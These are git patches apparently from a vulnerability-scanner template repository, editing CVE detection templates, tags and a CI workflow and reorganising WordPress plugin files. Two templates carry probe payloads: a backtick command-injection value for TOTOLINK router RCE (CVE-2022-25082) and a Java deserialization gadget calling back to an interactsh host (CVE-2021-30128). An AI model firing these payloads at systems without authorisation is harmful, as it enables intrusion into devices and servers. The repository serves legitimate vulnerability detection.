[PATCH 0482/1133] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 18a20c7119..ffde8a0417 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -16,8 +16,7 @@ info: cwe-id: CWE-77 tags: totolink,cve,cve2022,router,unauth,rce,iot variables: - cmd: "`ls>../{{randstr}}`" - + cmd: "`ls>../{{randstr}}`" requests: - raw: - | From 5ac6fa5d41c36b7106bb6abea586e5436fcb7014 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:15:18 +0530 Subject: [PATCH 0483/1133] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index ffde8a0417..a43e5a1a4d 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -14,9 +14,11 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce,iot + tags: totolink,cve,cve2022,router,unauth,rce,iot + variables: cmd: "`ls>../{{randstr}}`" + requests: - raw: - | From 2d2f1dcd89c583a7f3591894445067e7cba21a18 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 15:39:59 +0530 Subject: [PATCH 0484/1133] Update mysql-detect.yaml --- network/detection/mysql-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 17dac858a8..2831a51110 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -23,4 +23,3 @@ network: - type: word words: - "mysql" - condition: and From 363565e9e3512ff17ac6d5f945c1d5c18bb0758f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 15:41:57 +0530 Subject: [PATCH 0485/1133] fix lint --- network/detection/mysql-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 2831a51110..7cf65233ea 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -21,5 +21,6 @@ network: matchers: - type: word + part: body words: - "mysql" From 58c5340ee278f34678dcc51ad4e7eaf02a957961 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 15:47:42 +0530 Subject: [PATCH 0486/1133] added case insensitive --- network/detection/mysql-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 7cf65233ea..b3d4b26aa7 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -24,3 +24,4 @@ network: part: body words: - "mysql" + case-insensitive: true From a9a0e8d32b4735b687eac74a71b779e092a8bae2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:53:28 +0530 Subject: [PATCH 0487/1133] Content-Type Update --- cves/2022/CVE-2022-25082.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index a43e5a1a4d..e617718b45 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -36,6 +36,10 @@ requests: words: - ".sh" - ".cgi" + - type: word + part: header + words: + - 'application/octet-stream' condition: and - type: status From 22a005f6473b09cabcddf0abf7ba512ab29afc94 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 18:25:42 +0530 Subject: [PATCH 0488/1133] Update CVE-2021-30128.yaml --- cves/2021/CVE-2021-30128.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-30128.yaml b/cves/2021/CVE-2021-30128.yaml index 85c78a51a5..80ade242e6 100644 --- a/cves/2021/CVE-2021-30128.yaml +++ b/cves/2021/CVE-2021-30128.yaml @@ -20,16 +20,16 @@ requests: Host: {{Hostname}} Content-Type: text/xml - - + + {{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}} - - + + From 33078fdfa91c6d6300e27fa9ea4293dc8861e562 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Dec 2022 13:06:52 +0000 Subject: [PATCH 0489/1133] Auto Generated New Template Addition List [Fri Dec 16 13:06:52 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 16323993f7..681c2b8c83 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ cves/2021/CVE-2021-24827.yaml cves/2021/CVE-2021-25099.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml +cves/2022/CVE-2022-1595.yaml cves/2022/CVE-2022-2314.yaml cves/2022/CVE-2022-4050.yaml cves/2022/CVE-2022-45917.yaml @@ -46,6 +47,7 @@ network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml technologies/icecast-server-detect.yaml +technologies/mikrotik-httpproxy.yaml technologies/pagespeed-detect.yaml vulnerabilities/nps/nps-auth-bypass.yaml vulnerabilities/qibocms-file-download.yaml From d50395150377bf2fff6f4b7e9d74b2bada4a83cd Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 16 Dec 2022 19:01:50 +0530 Subject: [PATCH 0490/1133] updated dnssec to use matcher instead of extractors (#6380) --- dns/dnssec-detection.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 6563ec92fd..bba38137b3 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -16,9 +16,8 @@ dns: - name: "{{FQDN}}" type: DS - extractors: + matchers: - type: regex - group: 1 regex: - "IN\tDS\t(.+)" From fa13b8d88915e3030a46c97dfaac764b271edf42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 22:45:45 +0530 Subject: [PATCH 0491/1133] Update sitemap-detect.yaml --- miscellaneous/sitemap-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index ced3ce9a39..dd0e614fee 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -23,7 +23,7 @@ requests: matchers: - type: word words: - - "sitemap" + - "sitemap>" case-insensitive: true - type: word From 4472262319e8c17dacc75ff44cae204328e3d017 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:00:30 +0530 Subject: [PATCH 0492/1133] updated-matcher --- cves/2022/CVE-2022-1595.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 266ae72170..9d5329b78f 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -29,7 +29,7 @@ requests: part: header regex: - "Location: ([a-zA-Z0-9_.\\/-]+)" - - "wordpress" + - "wordpress_" condition: and - type: status From 191a9eae615a1c555c360667a9a482de241fc1aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:11:56 +0530 Subject: [PATCH 0493/1133] Update gyra-master-admin.yaml --- exposed-panels/gyra-master-admin.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/gyra-master-admin.yaml b/exposed-panels/gyra-master-admin.yaml index 5da78947bf..bb89fa451e 100644 --- a/exposed-panels/gyra-master-admin.yaml +++ b/exposed-panels/gyra-master-admin.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Login | GYRA Master Admin" - tags: panel,master,admin + tags: panel,master,admin,gyra requests: - method: GET @@ -17,6 +17,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Login | GYRA Master Admin" From 1b4413709ea71abff35c76be9d08501b6aede7d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:18:35 +0530 Subject: [PATCH 0494/1133] updated-tag --- vulnerabilities/qibocms-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index f80730e288..8d26a91827 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -6,7 +6,7 @@ info: severity: high metadata: verified: true - tags: qibocms,arbitary,download + tags: qibocms,lfr requests: - method: GET From 1a2a985b14a3bc72481158388b1d1c5d12a976d5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:30:09 +0530 Subject: [PATCH 0495/1133] updated-tags --- exposures/logs/firebase-debug-log.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/firebase-debug-log.yaml b/exposures/logs/firebase-debug-log.yaml index f68c3cb876..ba65f89d66 100644 --- a/exposures/logs/firebase-debug-log.yaml +++ b/exposures/logs/firebase-debug-log.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true github-query: filename:firebase-debug.log - tags: exposure,firebase,log,debug + tags: exposure,firebase,logs,debug requests: - method: GET From 604cadbc40afc99e3bfca389c88aec89d179d3cf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 23:30:59 +0530 Subject: [PATCH 0496/1133] Update npm-debug-log.yaml --- exposures/logs/npm-debug-log.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/npm-debug-log.yaml b/exposures/logs/npm-debug-log.yaml index 24856ffbd5..30d77a02d3 100644 --- a/exposures/logs/npm-debug-log.yaml +++ b/exposures/logs/npm-debug-log.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true github-query: filename:npm-debug.log - tags: exposure,npm,log,debug + tags: exposure,npm,logs,debug requests: - method: GET From a6094c0e0e57ba721c51c1da12997163bc6821f4 Mon Sep 17 00:00:00 2001 From: Irresistible-K <112374769+Irresistible-K@users.noreply.github.com> Date: Sat, 17 Dec 2022 01:35:36 +0530 Subject: [PATCH 0497/1133] Fix typo (#6381) FIxed a spelling error --- .github/workflows/template-db-indexer.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 19f985b0c9..ce977e552d 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -14,7 +14,7 @@ jobs: with: go-version: 1.17 - - name: Intalling Indexer + - name: Installing Indexer run: | git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github git clone https://github.com/projectdiscovery/nucleish-api.git @@ -26,4 +26,4 @@ jobs: AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }} run: | - generate-index -mode templates \ No newline at end of file + generate-index -mode templates From ac954aca975143826d400c6455a0da8064eb70c4 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Fri, 16 Dec 2022 18:13:03 -0300 Subject: [PATCH 0498/1133] refactoring --- .../wordpress/plugins/ad-inserter.txt | 0 .../wordpress/plugins/add-to-any.txt | 0 .../wordpress/plugins/admin-menu-editor.txt | 0 helpers/wordpress/plugins/adminimize.txt | 1 + .../plugins/advanced-custom-fields.txt | 1 + .../wordpress/plugins/akismet.txt | 0 .../plugins/all-404-redirect-to-homepage.txt | 0 .../wordpress/plugins/all-in-one-seo-pack.txt | 1 + .../plugins/all-in-one-wp-migration.txt | 0 .../all-in-one-wp-security-and-firewall.txt | 1 + .../wordpress/plugins/amp.txt | 0 .../wordpress/plugins/antispam-bee.txt | 0 helpers/wordpress/plugins/astra-sites.txt | 1 + .../wordpress/plugins/astra-widgets.txt | 0 .../wordpress/plugins/autoptimize.txt | 0 .../wordpress/plugins/backwpup.txt | 0 .../plugins/better-search-replace.txt | 0 .../wordpress/plugins/better-wp-security.txt | 0 .../plugins/black-studio-tinymce-widget.txt | 0 .../wordpress/plugins/breadcrumb-navxt.txt | 0 .../wordpress/plugins/broken-link-checker.txt | 0 .../plugins/child-theme-configurator.txt | 0 .../wordpress/plugins/classic-editor.txt | 0 .../wordpress/plugins/classic-widgets.txt | 0 .../plugins/click-to-chat-for-whatsapp.txt | 1 + .../wordpress/plugins/cloudflare.txt | 0 .../wordpress/plugins/cmb2.txt | 0 helpers/wordpress/plugins/coblocks.txt | 1 + .../wordpress/plugins/code-snippets.txt | 0 .../wordpress/plugins/coming-soon.txt | 0 helpers/wordpress/plugins/complianz-gdpr.txt | 1 + .../plugins/contact-form-7-honeypot.txt | 0 helpers/wordpress/plugins/contact-form-7.txt | 1 + .../wordpress/plugins/contact-form-cfdb7.txt | 0 helpers/wordpress/plugins/cookie-law-info.txt | 1 + helpers/wordpress/plugins/cookie-notice.txt | 1 + .../wordpress/plugins/creame-whatsapp-me.txt | 0 .../creative-mail-by-constant-contact.txt | 1 + .../wordpress/plugins/custom-css-js.txt | 0 .../wordpress/plugins/custom-fonts.txt | 0 .../wordpress/plugins/custom-post-type-ui.txt | 1 + .../wordpress/plugins/disable-comments.txt | 0 .../wordpress/plugins/disable-gutenberg.txt | 0 .../wordpress/plugins/duplicate-page.txt | 0 .../wordpress/plugins/duplicate-post.txt | 0 .../wordpress/plugins/duplicator.txt | 0 .../duracelltomi-google-tag-manager.txt | 0 helpers/wordpress/plugins/easy-fancybox.txt | 1 + .../wordpress/plugins/easy-google-fonts.txt | 0 .../plugins/easy-table-of-contents.txt | 0 .../wordpress/plugins/easy-wp-smtp.txt | 0 helpers/wordpress/plugins/elementor.txt | 1 + .../wordpress/plugins/elementskit-lite.txt | 1 + .../plugins/enable-media-replace.txt | 0 .../wordpress/plugins/envato-elements.txt | 0 .../essential-addons-for-elementor-lite.txt | 1 + .../plugins/ewww-image-optimizer.txt | 1 + .../plugins/facebook-for-woocommerce.txt | 0 .../favicon-by-realfavicongenerator.txt | 0 .../wordpress/plugins/flamingo.txt | 0 .../wordpress/plugins/fluentform.txt | 0 .../wordpress/plugins/font-awesome.txt | 0 .../plugins/force-regenerate-thumbnails.txt | 0 helpers/wordpress/plugins/formidable.txt | 1 + .../wordpress/plugins/forminator.txt | 0 .../wordpress/plugins/ga-google-analytics.txt | 0 .../google-analytics-dashboard-for-wp.txt | 1 + .../google-analytics-for-wordpress.txt | 1 + .../plugins/google-listings-and-ads.txt | 1 + .../wordpress/plugins/google-site-kit.txt | 0 .../plugins/google-sitemap-generator.txt | 0 .../wordpress/plugins/gtranslate.txt | 0 helpers/wordpress/plugins/gutenberg.txt | 1 + .../plugins/happy-elementor-addons.txt | 0 .../plugins/header-and-footer-scripts.txt | 0 .../plugins/header-footer-code-manager.txt | 1 + .../plugins/header-footer-elementor.txt | 0 .../wordpress/plugins/header-footer.txt | 0 .../wordpress/plugins/health-check.txt | 0 .../wordpress/plugins/hello-dolly.txt | 0 helpers/wordpress/plugins/imagify.txt | 1 + .../wordpress/plugins/imsanity.txt | 0 .../plugins/insert-headers-and-footers.txt | 1 + .../wordpress/plugins/instagram-feed.txt | 0 .../plugins/intuitive-custom-post-order.txt | 0 .../wordpress/plugins/iwp-client.txt | 0 helpers/wordpress/plugins/jetpack.txt | 1 + .../wordpress/plugins/kadence-blocks.txt | 0 .../wordpress/plugins/kirki.txt | 0 .../wordpress/plugins/leadin.txt | 0 .../plugins/limit-login-attempts-reloaded.txt | 1 + .../plugins/limit-login-attempts.txt | 0 helpers/wordpress/plugins/litespeed-cache.txt | 1 + .../wordpress/plugins/loco-translate.txt | 0 .../wordpress/plugins/loginizer.txt | 0 .../wordpress/plugins/loginpress.txt | 0 .../plugins/mailchimp-for-woocommerce.txt | 0 .../wordpress/plugins/mailchimp-for-wp.txt | 0 helpers/wordpress/plugins/mailpoet.txt | 1 + .../wordpress/plugins/maintenance.txt | 0 helpers/wordpress/plugins/mainwp-child.txt | 1 + .../wordpress/plugins/malcare-security.txt | 0 .../wordpress/plugins/megamenu.txt | 0 .../wordpress/plugins/members.txt | 0 helpers/wordpress/plugins/meta-box.txt | 1 + .../wordpress/plugins/ml-slider.txt | 0 helpers/wordpress/plugins/newsletter.txt | 1 + .../plugins/nextend-facebook-connect.txt | 0 .../wordpress/plugins/nextgen-gallery.txt | 0 .../wordpress/plugins/ninja-forms.txt | 0 .../wordpress/plugins/ocean-extra.txt | 0 .../plugins/official-facebook-pixel.txt | 0 .../plugins/one-click-demo-import.txt | 0 .../wordpress/plugins/optinmonster.txt | 0 .../wordpress/plugins/password-protected.txt | 0 .../wordpress/plugins/pdf-embedder.txt | 0 .../wordpress/plugins/photo-gallery.txt | 0 .../plugins/php-compatibility-checker.txt | 0 .../wordpress/plugins/pixelyoursite.txt | 0 .../wordpress/plugins/polylang.txt | 0 .../wordpress/plugins/popup-builder.txt | 0 .../wordpress/plugins/popup-maker.txt | 0 helpers/wordpress/plugins/post-smtp.txt | 1 + .../wordpress/plugins/post-types-order.txt | 0 .../plugins/premium-addons-for-elementor.txt | 1 + helpers/wordpress/plugins/pretty-link.txt | 1 + .../plugins/really-simple-captcha.txt | 0 .../wordpress/plugins/really-simple-ssl.txt | 0 helpers/wordpress/plugins/redirection.txt | 1 + .../wordpress/plugins/redux-framework.txt | 0 .../plugins/regenerate-thumbnails.txt | 0 .../wordpress/plugins/safe-svg.txt | 0 .../wordpress/plugins/seo-by-rank-math.txt | 0 .../wordpress/plugins/sg-cachepress.txt | 0 .../wordpress/plugins/sg-security.txt | 0 .../wordpress/plugins/shortcodes-ultimate.txt | 0 .../plugins/shortpixel-image-optimiser.txt | 0 .../plugins/simple-custom-post-order.txt | 0 .../plugins/simple-page-ordering.txt | 0 .../wordpress/plugins/siteguard.txt | 0 .../wordpress/plugins/siteorigin-panels.txt | 0 .../wordpress/plugins/smart-slider-3.txt | 0 .../wordpress/plugins/so-widgets-bundle.txt | 1 + .../plugins/ssl-insecure-content-fixer.txt | 0 .../stops-core-theme-and-plugin-updates.txt | 0 helpers/wordpress/plugins/sucuri-scanner.txt | 1 + helpers/wordpress/plugins/svg-support.txt | 1 + .../plugins/table-of-contents-plus.txt | 1 + .../wordpress/plugins/tablepress.txt | 0 .../plugins/taxonomy-terms-order.txt | 0 .../wordpress/plugins/the-events-calendar.txt | 1 + .../wordpress/plugins/themeisle-companion.txt | 0 .../wordpress/plugins/tinymce-advanced.txt | 0 .../plugins/translatepress-multilingual.txt | 1 + .../plugins/ultimate-addons-for-gutenberg.txt | 1 + .../plugins/under-construction-page.txt | 0 .../wordpress/plugins/unyson.txt | 0 helpers/wordpress/plugins/updraftplus.txt | 1 + .../wordpress/plugins/use-any-font.txt | 0 .../wordpress/plugins/user-role-editor.txt | 1 + .../plugins/velvet-blues-update-urls.txt | 0 helpers/wordpress/plugins/w3-total-cache.txt | 1 + .../plugins/webp-converter-for-media.txt | 1 + .../plugins/widget-importer-exporter.txt | 0 .../plugins/woo-cart-abandonment-recovery.txt | 1 + .../plugins/woo-checkout-field-editor-pro.txt | 1 + .../plugins/woo-variation-swatches.txt | 0 ...mmerce-gateway-paypal-express-checkout.txt | 0 .../plugins/woocommerce-gateway-stripe.txt | 0 .../plugins/woocommerce-payments.txt | 0 .../plugins/woocommerce-paypal-payments.txt | 1 + ...woocommerce-pdf-invoices-packing-slips.txt | 1 + .../plugins/woocommerce-services.txt | 0 helpers/wordpress/plugins/woocommerce.txt | 1 + .../wordpress/plugins/woosidebars.txt | 0 helpers/wordpress/plugins/wordfence.txt | 1 + .../wordpress/plugins/wordpress-importer.txt | 0 helpers/wordpress/plugins/wordpress-seo.txt | 1 + .../wordpress/plugins/worker.txt | 0 .../wordpress/plugins/wp-fastest-cache.txt | 1 + helpers/wordpress/plugins/wp-file-manager.txt | 1 + helpers/wordpress/plugins/wp-google-maps.txt | 1 + helpers/wordpress/plugins/wp-mail-smtp.txt | 1 + .../wordpress/plugins/wp-maintenance-mode.txt | 1 + .../wordpress/plugins/wp-migrate-db.txt | 0 .../wordpress/plugins/wp-multibyte-patch.txt | 0 helpers/wordpress/plugins/wp-optimize.txt | 1 + .../wordpress/plugins/wp-pagenavi.txt | 0 .../wordpress/plugins/wp-reset.txt | 0 .../wordpress/plugins/wp-sitemap-page.txt | 0 .../wordpress/plugins/wp-smushit.txt | 0 .../wordpress/plugins/wp-statistics.txt | 0 helpers/wordpress/plugins/wp-super-cache.txt | 1 + helpers/wordpress/plugins/wp-user-avatar.txt | 1 + .../wordpress/plugins/wpcf7-recaptcha.txt | 0 .../wordpress/plugins/wpcf7-redirect.txt | 0 .../wordpress/plugins/wpforms-lite.txt | 0 .../wordpress/plugins/wps-hide-login.txt | 0 .../plugins/yith-woocommerce-compare.txt | 1 + .../plugins/yith-woocommerce-wishlist.txt | 0 .../ad-inserter.yaml} | 6 +-- .../add-to-any.yaml} | 6 +-- .../admin-menu-editor.yaml} | 6 +-- .../adminimize.yaml} | 6 +-- .../advanced-custom-fields.yaml} | 6 +-- .../akismet.yaml} | 6 +-- .../all-404-redirect-to-homepage.yaml} | 6 +-- .../all-in-one-seo-pack.yaml} | 6 +-- .../all-in-one-wp-migration.yaml} | 6 +-- .../all-in-one-wp-security-and-firewall.yaml} | 6 +-- .../{wordpress-amp.yaml => plugins/amp.yaml} | 6 +-- .../antispam-bee.yaml} | 6 +-- .../astra-sites.yaml} | 6 +-- .../astra-widgets.yaml} | 6 +-- .../autoptimize.yaml} | 6 +-- .../backwpup.yaml} | 6 +-- .../better-search-replace.yaml} | 6 +-- .../better-wp-security.yaml} | 6 +-- .../black-studio-tinymce-widget.yaml} | 6 +-- .../breadcrumb-navxt.yaml} | 6 +-- .../broken-link-checker.yaml} | 6 +-- .../child-theme-configurator.yaml} | 6 +-- .../classic-editor.yaml} | 6 +-- .../classic-widgets.yaml} | 6 +-- .../click-to-chat-for-whatsapp.yaml} | 6 +-- .../cloudflare.yaml} | 6 +-- .../cmb2.yaml} | 6 +-- .../coblocks.yaml} | 6 +-- .../code-snippets.yaml} | 6 +-- .../coming-soon.yaml} | 6 +-- .../complianz-gdpr.yaml} | 6 +-- .../contact-form-7-honeypot.yaml} | 6 +-- .../contact-form-7.yaml} | 6 +-- .../contact-form-cfdb7.yaml} | 6 +-- .../cookie-law-info.yaml} | 6 +-- .../cookie-notice.yaml} | 6 +-- .../creame-whatsapp-me.yaml} | 6 +-- .../creative-mail-by-constant-contact.yaml} | 6 +-- .../custom-css-js.yaml} | 6 +-- .../custom-fonts.yaml} | 6 +-- .../custom-post-type-ui.yaml} | 6 +-- .../disable-comments.yaml} | 6 +-- .../disable-gutenberg.yaml} | 6 +-- .../duplicate-page.yaml} | 6 +-- .../duplicate-post.yaml} | 6 +-- .../duplicator.yaml} | 6 +-- .../duracelltomi-google-tag-manager.yaml} | 6 +-- .../easy-fancybox.yaml} | 6 +-- .../easy-google-fonts.yaml} | 6 +-- .../easy-table-of-contents.yaml} | 6 +-- .../easy-wp-smtp.yaml} | 6 +-- .../elementor.yaml} | 6 +-- .../elementskit-lite.yaml} | 6 +-- .../enable-media-replace.yaml} | 6 +-- .../envato-elements.yaml} | 6 +-- .../essential-addons-for-elementor-lite.yaml} | 6 +-- .../ewww-image-optimizer.yaml} | 6 +-- .../facebook-for-woocommerce.yaml} | 6 +-- .../favicon-by-realfavicongenerator.yaml} | 6 +-- .../flamingo.yaml} | 6 +-- .../fluentform.yaml} | 6 +-- .../font-awesome.yaml} | 6 +-- .../force-regenerate-thumbnails.yaml} | 6 +-- .../formidable.yaml} | 6 +-- .../forminator.yaml} | 6 +-- .../ga-google-analytics.yaml} | 6 +-- .../google-analytics-dashboard-for-wp.yaml} | 6 +-- .../google-analytics-for-wordpress.yaml} | 6 +-- .../google-listings-and-ads.yaml} | 6 +-- .../google-site-kit.yaml} | 6 +-- .../google-sitemap-generator.yaml} | 6 +-- .../gtranslate.yaml} | 6 +-- .../gutenberg.yaml} | 6 +-- .../happy-elementor-addons.yaml} | 6 +-- .../header-and-footer-scripts.yaml} | 6 +-- .../header-footer-code-manager.yaml} | 6 +-- .../header-footer-elementor.yaml} | 6 +-- .../header-footer.yaml} | 6 +-- .../health-check.yaml} | 6 +-- .../hello-dolly.yaml} | 6 +-- .../imagify.yaml} | 6 +-- .../imsanity.yaml} | 6 +-- .../insert-headers-and-footers.yaml} | 6 +-- .../instagram-feed.yaml} | 6 +-- .../intuitive-custom-post-order.yaml} | 6 +-- .../iwp-client.yaml} | 6 +-- .../jetpack.yaml} | 6 +-- .../kadence-blocks.yaml} | 6 +-- .../kirki.yaml} | 6 +-- .../leadin.yaml} | 6 +-- .../limit-login-attempts-reloaded.yaml} | 6 +-- .../limit-login-attempts.yaml} | 6 +-- .../litespeed-cache.yaml} | 6 +-- .../loco-translate.yaml} | 6 +-- .../loginizer.yaml} | 6 +-- .../loginpress.yaml} | 6 +-- .../mailchimp-for-woocommerce.yaml} | 6 +-- .../mailchimp-for-wp.yaml} | 6 +-- .../mailpoet.yaml} | 6 +-- .../maintenance.yaml} | 6 +-- .../mainwp-child.yaml} | 6 +-- .../malcare-security.yaml} | 6 +-- .../megamenu.yaml} | 6 +-- .../members.yaml} | 6 +-- .../meta-box.yaml} | 6 +-- .../ml-slider.yaml} | 6 +-- .../newsletter.yaml} | 6 +-- .../nextend-facebook-connect.yaml} | 6 +-- .../nextgen-gallery.yaml} | 6 +-- .../ninja-forms.yaml} | 6 +-- .../ocean-extra.yaml} | 6 +-- .../official-facebook-pixel.yaml} | 6 +-- .../one-click-demo-import.yaml} | 6 +-- .../optinmonster.yaml} | 6 +-- .../password-protected.yaml} | 6 +-- .../pdf-embedder.yaml} | 6 +-- .../photo-gallery.yaml} | 6 +-- .../php-compatibility-checker.yaml} | 6 +-- .../pixelyoursite.yaml} | 6 +-- .../polylang.yaml} | 6 +-- .../popup-builder.yaml} | 6 +-- .../popup-maker.yaml} | 6 +-- .../post-smtp.yaml} | 6 +-- .../post-types-order.yaml} | 6 +-- .../premium-addons-for-elementor.yaml} | 6 +-- .../pretty-link.yaml} | 6 +-- .../really-simple-captcha.yaml} | 6 +-- .../really-simple-ssl.yaml} | 6 +-- .../redirection.yaml} | 6 +-- .../redux-framework.yaml} | 6 +-- .../regenerate-thumbnails.yaml} | 6 +-- .../safe-svg.yaml} | 6 +-- .../seo-by-rank-math.yaml} | 6 +-- .../sg-cachepress.yaml} | 6 +-- .../sg-security.yaml} | 6 +-- .../shortcodes-ultimate.yaml} | 6 +-- .../shortpixel-image-optimiser.yaml} | 6 +-- .../simple-custom-post-order.yaml} | 6 +-- .../simple-page-ordering.yaml} | 6 +-- .../siteguard.yaml} | 6 +-- .../siteorigin-panels.yaml} | 6 +-- .../smart-slider-3.yaml} | 6 +-- .../so-widgets-bundle.yaml} | 6 +-- .../ssl-insecure-content-fixer.yaml} | 6 +-- .../stops-core-theme-and-plugin-updates.yaml} | 6 +-- .../sucuri-scanner.yaml} | 6 +-- .../svg-support.yaml} | 6 +-- .../table-of-contents-plus.yaml} | 6 +-- .../tablepress.yaml} | 6 +-- .../taxonomy-terms-order.yaml} | 6 +-- .../the-events-calendar.yaml} | 6 +-- .../themeisle-companion.yaml} | 6 +-- .../tinymce-advanced.yaml} | 6 +-- .../translatepress-multilingual.yaml} | 6 +-- .../ultimate-addons-for-gutenberg.yaml} | 6 +-- .../under-construction-page.yaml} | 6 +-- .../unyson.yaml} | 6 +-- .../updraftplus.yaml} | 6 +-- .../use-any-font.yaml} | 6 +-- .../user-role-editor.yaml} | 6 +-- .../velvet-blues-update-urls.yaml} | 6 +-- .../w3-total-cache.yaml} | 6 +-- .../plugins/webp-converter-for-media.yaml | 50 +++++++++++++++++++ .../widget-importer-exporter.yaml} | 6 +-- .../woo-cart-abandonment-recovery.yaml} | 6 +-- .../woo-checkout-field-editor-pro.yaml} | 6 +-- .../woo-variation-swatches.yaml} | 6 +-- ...erce-gateway-paypal-express-checkout.yaml} | 6 +-- .../woocommerce-gateway-stripe.yaml} | 6 +-- .../woocommerce-payments.yaml} | 6 +-- .../woocommerce-paypal-payments.yaml} | 6 +-- ...ocommerce-pdf-invoices-packing-slips.yaml} | 6 +-- .../woocommerce-services.yaml} | 6 +-- .../woocommerce.yaml} | 6 +-- .../woosidebars.yaml} | 6 +-- .../wordfence.yaml} | 6 +-- .../wordpress-importer.yaml} | 6 +-- .../wordpress-seo.yaml} | 6 +-- .../worker.yaml} | 6 +-- .../wp-fastest-cache.yaml} | 6 +-- .../wp-file-manager.yaml} | 6 +-- .../wp-google-maps.yaml} | 6 +-- .../wp-mail-smtp.yaml} | 6 +-- .../wp-maintenance-mode.yaml} | 6 +-- .../wp-migrate-db.yaml} | 6 +-- .../wp-multibyte-patch.yaml} | 6 +-- .../wp-optimize.yaml} | 6 +-- .../wp-pagenavi.yaml} | 6 +-- .../wp-reset.yaml} | 6 +-- .../wp-sitemap-page.yaml} | 6 +-- 